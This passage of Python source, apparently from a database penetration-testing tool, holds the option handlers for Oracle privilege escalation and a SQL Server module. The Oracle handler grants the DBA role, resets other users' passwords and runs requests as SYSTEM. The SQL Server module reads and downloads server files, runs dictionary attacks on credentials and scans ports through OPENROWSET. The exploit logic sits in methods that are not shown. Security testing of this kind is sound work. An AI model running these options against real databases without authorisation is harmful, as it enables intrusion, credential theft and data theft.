        return EXIT_MISS_ARGUMENT
    privilegeEscalation = PrivilegeEscalation(args)
    status = privilegeEscalation.connection(stopIfError=True)

    def grantDbaRole(option, title, methodName, reportOtherStatus):
        # Shared reporting for the "dba-with-*" options. Only the ANALYZE ANY
        # and CREATE ANY INDEX variants report a status that is neither an
        # Exception, None nor True.
        if args[option] == True:
            args['print'].title(title)
            outcome = getattr(privilegeEscalation, methodName)()
            if isinstance(outcome, Exception):
                args['print'].badNews("Impossible to grant DBA role to current user: {0}".format(outcome))
            elif outcome == None:
                args['print'].unknownNews("The current user has already DBA role")
            elif outcome == True:
                args['print'].goodNews("The DBA role has been granted to this current user")
            elif reportOtherStatus:
                args['print'].badNews("The DBA role has NOT been granted to this current user")

    def executeAsSystem(option, title, methodName):
        # Shared reporting for the "exec-with-*" options: an Exception and
        # True are reported, any other status prints nothing.
        if args[option] != None:
            args['print'].title(title)
            outcome = getattr(privilegeEscalation, methodName)(privRequest=args[option][0])
            if isinstance(outcome, Exception):
                args['print'].badNews("Impossible to execute the request as SYSTEM: {0}".format(outcome))
            elif outcome == True:
                args['print'].goodNews("The request has been executed successfully as system")

    if args['test-module'] == True:
        args['print'].title("Test if the current user can gain elevated access (privilege escalation)")
        status = privilegeEscalation.testAll()
    if args['get-privs'] == True:
        args['print'].title("Get system privileges and roles of current Oracle user")
        status = privilegeEscalation.printPrivilegesAndRoles()
    if args['get-detailed-privs'] == True:
        args['print'].title("Get system privileges and roles of current Oracle user + roles and privileges of roles granted to this current user")
        status = privilegeEscalation.printPrivilegesAndRoles(deep=True)
    if args['revoke-dba-role'] == True:
        args['print'].title("Revoke DBA role from current user ({0})".format(privilegeEscalation.args['user']))
        status = privilegeEscalation.revokeDbaRole()
        if isinstance(status, Exception):
            args['print'].badNews("Impossible to revoke DBA role from {0}: {1}".format(privilegeEscalation.args['user'], status))
        else:
            args['print'].goodNews("The DBA role has been revoked from {0}".format(privilegeEscalation.args['user']))
    grantDbaRole(
        'dba-with-execute-any-procedure',
        "Grant DBA role to current user with CREATE/EXECUTE ANY PROCEDURE method",
        "giveDbaRoleWithExecuteAnyProcedureMethod",
        False)
    if args['alter-pwd-with-create-any-procedure'] != None:
        alterValues = privilegeEscalation.args['alter-pwd-with-create-any-procedure']
        user, newpwd = alterValues[0], alterValues[1]
        args['print'].title("Alter the password of {0} by '{1}' with CREATE ANY PROCEDURE method".format(user, newpwd))
        status = privilegeEscalation.setPasswordWithCreateAnyProcedureMethod(user, newpwd)
        if isinstance(status, Exception):
            args['print'].badNews("Impossible to alter the password of {0}: {1}".format(user, status))
        elif status == True:
            args['print'].goodNews("Password of {0} user modified: The new password of {0} is '{1}'".format(user, newpwd))
    grantDbaRole(
        'dba-with-create-any-trigger',
        "Grant DBA role to current user with CREATE ANY TRIGGER method",
        "giveDbaRoleWithCreateAnyTriggerMethod",
        False)
    grantDbaRole(
        'dba-with-analyze-any',
        "Grant DBA role to current user with ANALYZE ANY method",
        "giveDbaRoleWithAnalyzeAnyMethod",
        True)
    grantDbaRole(
        'dba-with-create-any-index',
        "Grant DBA role to current user with CREATE ANY INDEX method",
        "giveDbaRoleWithCreateAnyIndexMethod",
        True)
    # Semi manual exploitation
    executeAsSystem(
        'exec-with-execute-any-procedure',
        "Execute the request as SYSTEM with CREATE/EXECUTE ANY PROCEDURE method",
        "executeRequestWithExecuteAnyProcedureMethod")
    executeAsSystem(
        'exec-with-create-any-procedure',
        "Execute the request as SYSTEM with CREATE ANY PROCEDURE method only",
        "executeSytemRequestWithCreateAnyProcedureMethod")
    executeAsSystem(
        'exec-with-create-any-trigger',
        "Execute the request as SYSTEM with CREATE ANY TRIGGER method",
        "executeSytemRequestWithCreateAnyTriggerMethod")
    executeAsSystem(
        'exec-with-analyze-any',
        "Execute the request as SYSTEM with ANALYZE ANY method",
        "executeSytemRequestWithAnalyzeAnyMethod")
    executeAsSystem(
        'exec-with-create-any-index',
        "Execute the request as SYSTEM with CREATE ANY INDEX method",
        "executeSytemRequestWithCreateAnyIndexMethod")
Example #51
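def runBulkOpenModule(args):
	'''
	Run the BulkOpen module.

	Connects with BulkOpen(args) and then handles, in this order, every
	option that is set in args: test-module, enable-ad-hoc-distributed-queries,
	read-file, get-file, search-credentials, request-rdb, scan-ports and
	disable-ad-hoc-distributed-queries. The connection is closed at the end.

	args is the option dictionary; args['print'] is the output object
	(title/goodNews/badNews). Returns EXIT_MISS_ARGUMENT when
	checkOptionsGivenByTheUser() rejects the options, otherwise nothing.
	'''

	def runBulkInsertForRead(args,bulkOpen):
		'''
		Read the remote file args["read-file"][0] with the Bulk Insert method.
		Returns True when the content was printed, otherwise the Exception
		returned by bulkOpen.readFileViaBulkinsert().
		'''
		remotePath = args["read-file"][0]
		args['print'].title("Try to read the remote file {0} thanks to the Bulk Insert method".format(remotePath))
		data = bulkOpen.readFileViaBulkinsert(remotePath)
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to read the remote file {0} with Bulk Insert: {1}".format(remotePath,data))
			return data
		args['print'].goodNews("Data stored in the remote file {0}:\n{1}".format(remotePath, data.encode('utf-8')))
		return True

	def runOpenRowSetForRead(args,bulkOpen):
		'''
		Read the remote file args["read-file"][0] with the Openrowset method.
		Returns True when the content was printed, otherwise the Exception
		returned by bulkOpen.readFileViaOpenRowSet().
		'''
		remotePath = args["read-file"][0]
		args['print'].title("Try to read the remote file {0} thanks to the Openrowset method".format(remotePath))
		data = bulkOpen.readFileViaOpenRowSet(remotePath)
		if isinstance(data,Exception):
			args['print'].badNews("Impossible to read the remote file {0} with Openrowset: {1}".format(remotePath,data))
			return data
		args['print'].goodNews("Data stored in the remote file {0}:\n{1}".format(remotePath, data.encode('utf-8')))
		return True

	def runBulkInsertForGet(args, bulkOpen):
		'''
		Copy the remote file args["get-file"][0] to the local path
		args["get-file"][1] with the Bulk Insert method.
		Returns True on success, otherwise the Exception returned by
		bulkOpen.getFileViaBulkinsert().
		'''
		remotePath, localPath = args["get-file"][0], args["get-file"][1]
		args['print'].title("Try to get the remote file {0} thanks to the Bulk Insert method".format(remotePath))
		status = bulkOpen.getFileViaBulkinsert(remotePath,localPath)
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to get the remote file {0} with Bulk Insert: {1}".format(remotePath,status))
			return status
		args['print'].goodNews("Data stored in the remote file {0} is saved in the file {1}".format(remotePath, localPath))
		return True

	def runOpenRowSetForGet(args, bulkOpen):
		'''
		Copy the remote file args["get-file"][0] to the local path
		args["get-file"][1] with the Openrowset method.
		Returns True on success, otherwise the Exception returned by
		bulkOpen.getFileViaOpenRowSet().
		'''
		remotePath, localPath = args["get-file"][0], args["get-file"][1]
		args['print'].title("Try to get the remote file {0} thanks to the Openrowset method".format(remotePath))
		status = bulkOpen.getFileViaOpenRowSet(remotePath,localPath)
		if isinstance(status,Exception):
			args['print'].badNews("Impossible to get the remote file {0} with Openrowset: {1}".format(remotePath,status))
			return status
		args['print'].goodNews("Data stored in the remote file {0} is saved in the file {1}".format(remotePath, localPath))
		return True

	# NOTE(review): "test-module" is read below but is not in this list, unlike
	# the other run*Module functions on this page - confirm whether
	# checkOptionsGivenByTheUser() needs it here.
	if checkOptionsGivenByTheUser(args,["read-file","get-file","enable-ad-hoc-distributed-queries","disable-ad-hoc-distributed-queries","search-credentials","scan-ports","request-rdb"],checkAccount=True) == False : return EXIT_MISS_ARGUMENT
	bulkOpen = BulkOpen(args)
	bulkOpen.connect()
	if args["test-module"] == True:
		bulkOpen.testAll()
	#enable-ad-hoc-distributed-queries
	if args["enable-ad-hoc-distributed-queries"] == True:
		args['print'].title("Try to enable ad hoc distributed queries")
		status = bulkOpen.enableAdHocDistributedQueries()
		# status is compared with True on purpose: on failure it holds an error
		# object, which would be truthy.
		if status == True:
			args['print'].goodNews("Ad hoc distributed queries has been enabled")
		else:
			# The placeholder was {1} with a single argument, which raised
			# IndexError instead of reporting the failure.
			args['print'].badNews("Impossible to enable ad hoc distributed queries: {0}".format(status))
	#read-file option
	if args["read-file"] is not None:
		if args["method"] is not None:
			if args["method"]==BULKOPEN_METHOD_IN_BULKOPEN:
				runBulkInsertForRead(args,bulkOpen)
			elif args["method"]==OPENROWSET_METHOD_IN_BULKOPEN:
				runOpenRowSetForRead(args,bulkOpen)
		else:
			# No method chosen: try Bulk Insert first, fall back to Openrowset.
			data = runBulkInsertForRead(args,bulkOpen)
			if isinstance(data,Exception):
				runOpenRowSetForRead(args,bulkOpen)
	#get-file option
	if args["get-file"] is not None:
		if args["method"] is not None:
			if args["method"]==BULKOPEN_METHOD_IN_BULKOPEN:
				runBulkInsertForGet(args,bulkOpen)
			elif args["method"]==OPENROWSET_METHOD_IN_BULKOPEN:
				runOpenRowSetForGet(args,bulkOpen)
		else:
			# No method chosen: try Bulk Insert first, fall back to Openrowset.
			data = runBulkInsertForGet(args,bulkOpen)
			if isinstance(data,Exception):
				runOpenRowSetForGet(args,bulkOpen)
	#dictionary attack on a remote database
	if args["search-credentials"] is not None:
		rdbHost = args["search-credentials"][0]
		rdbPort = args["search-credentials"][1]
		rdbName = args["search-credentials"][2]
		args['print'].title("Dictionnary attack on the database {0}:{1}/{2} with the credentials file {3}".format(rdbHost,rdbPort,rdbName,args['accounts-file']))
		accounts = bulkOpen.searchValideAccounts(rdbHost,rdbPort,rdbName, sqlRequest=DEFAULT_SQL_REQUEST, accountsFile=args['accounts-file'])
		if isinstance(accounts,Exception):
			# First attempt failed: enable ad hoc distributed queries and retry once.
			status = bulkOpen.enableAdHocDistributedQueries()
			if status == True:
				accounts = bulkOpen.searchValideAccounts(rdbHost,rdbPort,rdbName, sqlRequest=DEFAULT_SQL_REQUEST, accountsFile=args['accounts-file'])
				if isinstance(accounts,Exception):
					# Enabling succeeded here, so only the connection error is
					# reported (the old message also claimed the enable failed).
					args['print'].badNews("Impossible to use openrowset to connect to a remote database: {0}".format(accounts))
				else :
					args['print'].goodNews("valid accounts found on {0}:{1}/{2}: {3}".format(rdbHost,rdbPort,rdbName,accounts))
				# This function switched the setting on, so it is switched off
				# again whether or not the retry worked; previously a failed
				# retry left the server configuration changed.
				bulkOpen.disableAdHocDistributedQueries()
			else :
				args['print'].badNews("Impossible to use openrowset to connect to a remote database: {0}. Impossible to enable OpenRowset: {1}".format(accounts,status))
		else:
			args['print'].goodNews("valid accounts found on {0}:{1}/{2}: {3}".format(rdbHost,rdbPort,rdbName,accounts))
	#request a remote database from the target
	if args["request-rdb"] is not None:
		# request-rdb layout as used below: [0]=ip, [1]=port, [2]=database,
		# [3]=login, [4]=password, [5]=SQL request.
		rdb = args["request-rdb"]
		# NOTE(review): the title prints the remote password ([4]) in clear text,
		# so it ends up in any captured output or log of this run.
		args['print'].title("Try to send the request '{0}' to {1}:{2}@{3}:{4}/{5}".format(rdb[5], rdb[3], rdb[4], rdb[0], rdb[1], rdb[2]))
		results = bulkOpen.remoteConnectionWithOpenrowset (ip=rdb[0], port=rdb[1], login=rdb[3], password=rdb[4], database=rdb[2], sqlRequest=rdb[5])
		if isinstance(results ,Exception):
			args['print'].badNews("Impossible to request the remote database: {0}".format(results))
		else:
			# One output line per returned row, columns separated by ' | '.
			table = "".join(' | '.join(map(str,row))+'\n' for row in results)
			args['print'].goodNews("Results:\n{0}".format(table))
	#Scan ports with openrowset
	if args['scan-ports'] is not None:
		args['print'].title("Scanning ports of {0} through {1}".format(args['scan-ports'][0],args['host']))
		results = bulkOpen.scanPortsWithOpenrowset(ip=args['scan-ports'][0], ports=args['scan-ports'][1], nbThread=SCAN_PORT_NUMBER_THREAD)
		# Only a failure is reported here; nothing is printed for a successful scan
		# by this function.
		if isinstance(results ,Exception):
			args['print'].badNews("Impossible to scan ports: {0}".format(results))
	#disable-ad-hoc-distributed-queries
	if args["disable-ad-hoc-distributed-queries"] == True:
		args['print'].title("Try to disable ad hoc distributed queries")
		status = bulkOpen.disableAdHocDistributedQueries()
		if status == True:
			args['print'].goodNews("Ad hoc distributed queries has been disabled")
		else:
			args['print'].badNews("Impossible to disable ad hoc distributed queries: {0}".format(status))
	bulkOpen.closeConnection()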